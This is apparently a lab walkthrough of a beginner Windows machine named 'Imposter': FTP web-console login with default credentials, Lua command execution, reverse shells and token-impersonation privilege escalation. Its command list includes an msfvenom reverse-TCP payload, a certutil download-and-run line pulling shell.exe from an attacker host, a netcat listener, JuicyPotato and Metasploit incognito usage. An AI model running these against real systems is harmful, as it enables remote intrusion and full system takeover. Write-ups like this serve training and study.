Premise
In this walk-through, we demonstrated how to enumerate and exploit a vulnerable FTP server to gain remote access to the windows system. Then we did a privilege escalation through token impersonation.
Machine Name: Imposter
Difficulty: Beginner
Skills Learned
- FTP exploitation
- Windows Privilege Escalation
- Token Impersonation with Metasploit
Scanning and Enumeration
I started with an Nmap scan to see what ports were open. The scan showed that the machine was running Windows Server 2008 R2 and had an FTP server on port 8080 with a web interface. I also saw that NetBIOS was enabled, which meant I could enumerate SMB clients.
Exploiting the FTP Server
I was able to log into the FTP server’s web interface using the default credentials admin/password. This is a common mistake that makes servers vulnerable. The web interface had an administration console that allowed me to execute Lua commands using OS.execute("command")
.
Getting a Reverse Shell
I explored a few different ways to get a reverse shell:
- Payload Transfer: I created a Windows Meterpreter reverse TCP payload with
msfvenom
and transferred it to the target machine usingcertutil
. Then, I set up a Netcat listener and executed the payload. - Netcat Download: Another option was to download Netcat directly to the target machine and use it to create a reverse shell.
- Metasploit Web Delivery: I also used the
exploit/multi/script/web_delivery
module in Metasploit. This module generates a command that, when run on the target, delivers a payload and creates a session. Since I couldn’t copy and paste into the web interface, I had to type the command in manually.
Privilege Escalation
Once I had a shell, I used whoami /priv
to check my privileges. I saw that I had the SeImpersonatePrivilege
, which is a key vulnerability.
I tried using Juicy Potato to escalate my privileges by abusing this impersonation privilege. This involved downloading the Juicy Potato tool, transferring it to the target machine, and running it with a specific CLSID and a payload. I made a mistake at first and used the wrong CLSID, but I eventually figured it out.
As an alternative, I used the incognito
module in Metasploit. This module let me list the available tokens and impersonate them. I used list_tokens -u
to find the NT AUTHORITY\SYSTEM
token and then impersonate_token "NT AUTHORITY\SYSTEM"
to escalate my privileges.
In the end, I successfully escalated my privileges to NT AUTHORITY\SYSTEM
using the incognito
module. It’s important to remember that not all methods will work on every machine, so it’s good to have a few different options to try.
Technical Commands
Here are some of the commands I used in the video:
msfvenom
:msfvenom -p windows/meterpreter/reverse_tcp lhost=<YOUR_IP> lport=4545 -f exe -o shell.exe
- Lua Commands:Lua
os.execute("cmd.exe /c certutil.exe -urlcache -f http://<YOUR_IP>:8000/shell.exe shell.exe") os.execute("cmd.exe /c shell.exe")
- Netcat:
nc -lvp 4545
- Juicy Potato:
JuicyPotato.exe -l 3344 -t * -p C:\Windows\System32\cmd.exe -c {CLS_ID}
incognito
(Metasploit):list_tokens -u impersonate_token "NT AUTHORITY\SYSTEM"